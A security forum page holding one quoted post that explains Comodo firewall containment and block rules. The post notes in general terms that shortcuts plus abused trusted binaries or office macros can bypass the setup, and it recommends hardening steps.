Forums
New posts
Search forums
News
Security News
Technology News
Giveaways
Giveaways, Promotions and Contests
Discounts & Deals
Reviews
Users Reviews
Video Reviews
Support
Windows Malware Removal Help & Support
Inactive Support Threads
Mac Malware Removal Help & Support
Mobile Malware Removal Help & Support
Blog
Log in
Register
What's new
Search
Search titles only
By:
Search titles only
By:
Reply to thread
Menu
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Forums
Security
Video Reviews - Security and Privacy
Comodo's killer.
Message
<blockquote data-quote="Andy Ful" data-source="post: 1114709" data-attributes="member: 32260"><p>It is unimportant because the ISO file is not an executable/application. In my tests I used Edge.</p><p></p><p></p><p></p><p>These rules should work in the same way as:</p><p>Action - Run Virtually, File Group - All Applications, File Origin - Removable Media</p><p>Action - Run Virtually, File Group - All Applications, File Origin - Internet</p><p>Action - Run Virtually, File Group - All Applications, File Rating - Unrecognized (default policy)</p><p></p><p>Simply, all applications executed from Removable Media and Internet are contained. The Unrecognized applications are contained everywhere. The Proactive setup includes also three Block rules for Malicious Applications, Suspicious Locations, and Containment Folders</p><p>These settings will <s>contain most of my POCs and</s> prevent most malware including 0-day ones. It is a very strong setup.</p><p>It is possible to bypass such a setup by using shortcuts + abusing the Trusted applications already installed in the system (LOLBins, MS Office, etc.). For example, Comodo's challenge method used in my video is not blocked (shortcut + LOLBin abused) and all my POCs are not blocked when running office macros.</p><p>I would also enable Embedded Code Detection for cmd[.]exe (to prevent many attacks via shortcuts), and block macros in office applications.</p><p></p><p>Post edited.</p></blockquote><p></p>
[QUOTE="Andy Ful, post: 1114709, member: 32260"] It is unimportant because the ISO file is not an executable/application. In my tests I used Edge. These rules should work in the same way as: Action - Run Virtually, File Group - All Applications, File Origin - Removable Media Action - Run Virtually, File Group - All Applications, File Origin - Internet Action - Run Virtually, File Group - All Applications, File Rating - Unrecognized (default policy) Simply, all applications executed from Removable Media and Internet are contained. The Unrecognized applications are contained everywhere. The Proactive setup includes also three Block rules for Malicious Applications, Suspicious Locations, and Containment Folders These settings will [S]contain most of my POCs and[/S] prevent most malware including 0-day ones. It is a very strong setup. It is possible to bypass such a setup by using shortcuts + abusing the Trusted applications already installed in the system (LOLBins, MS Office, etc.). For example, Comodo's challenge method used in my video is not blocked (shortcut + LOLBin abused) and all my POCs are not blocked when running office macros. I would also enable Embedded Code Detection for cmd[.]exe (to prevent many attacks via shortcuts), and block macros in office applications. Post edited. [/QUOTE]
Insert quotes…
Verification
Post reply
Top
